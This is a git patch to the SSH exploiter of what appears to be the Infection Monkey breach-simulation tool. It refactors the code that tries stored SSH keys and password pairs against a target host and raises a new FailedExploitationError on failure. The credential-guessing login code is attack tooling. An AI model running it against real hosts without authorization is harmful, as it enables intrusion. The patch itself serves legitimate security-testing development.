From a6e61215f397cbb231d41394b28e641d0691c595 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 30 Oct 2019 14:45:30 +0200 Subject: [PATCH] SSH banner read timeout exception (tunneling) bugfix --- monkey/infection_monkey/exploit/sshexec.py | 54 +++++++++---------- .../exploit/tools/exceptions.py | 5 +- 2 files changed, 30 insertions(+), 29 deletions(-) diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index ce2e0d13c..4a88c4593 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -5,11 +5,11 @@ import time import paramiko import infection_monkey.monkeyfs as monkeyfs -from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.model import MONKEY_ARG +from infection_monkey.exploit.tools.exceptions import FailedExploitationError from infection_monkey.network.tools import check_tcp_port from common.utils.exploit_enum import ExploitType from common.utils.attack_utils import ScanStatus @@ -38,15 +38,16 @@ class SSHExploiter(HostExploiter): LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total) self._update_timestamp = time.time() - def exploit_with_ssh_keys(self, port, ssh): + def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient: user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs() - exploited = False - for user, ssh_key_pair in user_ssh_key_pairs: # Creating file-like private key for paramiko pkey = io.StringIO(ssh_key_pair['private_key']) ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip']) + + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: pkey = paramiko.RSAKey.from_private_key(pkey) except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException): @@ -55,52 +56,49 @@ class SSHExploiter(HostExploiter): ssh.connect(self.host.ip_addr, username=user, pkey=pkey, - port=port, - timeout=None) + port=port) LOG.debug("Successfully logged in %s using %s users private key", self.host, ssh_string) - exploited = True self.report_login_attempt(True, user, ssh_key=ssh_string) - break - except Exception as exc: + return ssh + except Exception: + ssh.close() LOG.debug("Error logging into victim %r with %s" " private key", self.host, ssh_string) self.report_login_attempt(False, user, ssh_key=ssh_string) continue - return exploited + raise FailedExploitationError - def exploit_with_login_creds(self, port, ssh): + def exploit_with_login_creds(self, port) -> paramiko.SSHClient: user_password_pairs = self._config.get_exploit_user_password_pairs() - exploited = False - for user, current_password in user_password_pairs: + + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: ssh.connect(self.host.ip_addr, username=user, password=current_password, - port=port, - timeout=None) + port=port) LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", self.host, user, self._config.hash_sensitive_data(current_password)) - exploited = True self.add_vuln_port(port) self.report_login_attempt(True, user, current_password) - break + return ssh except Exception as exc: LOG.debug("Error logging into victim %r with user" " %s and password (SHA-512) '%s': (%s)", self.host, user, self._config.hash_sensitive_data(current_password), exc) self.report_login_attempt(False, user, current_password) + ssh.close() continue - return exploited + raise FailedExploitationError def _exploit_host(self): - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) port = SSH_PORT # if ssh banner found on different port, use that port. @@ -113,14 +111,14 @@ class SSHExploiter(HostExploiter): LOG.info("SSH port is closed on %r, skipping", self.host) return False - # Check for possible ssh exploits - exploited = self.exploit_with_ssh_keys(port, ssh) - if not exploited: - exploited = self.exploit_with_login_creds(port, ssh) - - if not exploited: - LOG.debug("Exploiter SSHExploiter is giving up...") - return False + try: + ssh = self.exploit_with_ssh_keys(port) + except FailedExploitationError: + try: + ssh = self.exploit_with_login_creds(port) + except FailedExploitationError: + LOG.debug("Exploiter SSHExploiter is giving up...") + return False if not self.host.os.get('type'): try: diff --git a/monkey/infection_monkey/exploit/tools/exceptions.py b/monkey/infection_monkey/exploit/tools/exceptions.py index eabe8d9d7..a322dc5bd 100644 --- a/monkey/infection_monkey/exploit/tools/exceptions.py +++ b/monkey/infection_monkey/exploit/tools/exceptions.py @@ -2,4 +2,7 @@ class ExploitingVulnerableMachineError(Exception): """ Raise when exploiter failed, but machine is vulnerable""" - pass + + +class FailedExploitationError(Exception): + """ Raise when exploiter fails instead of returning False"""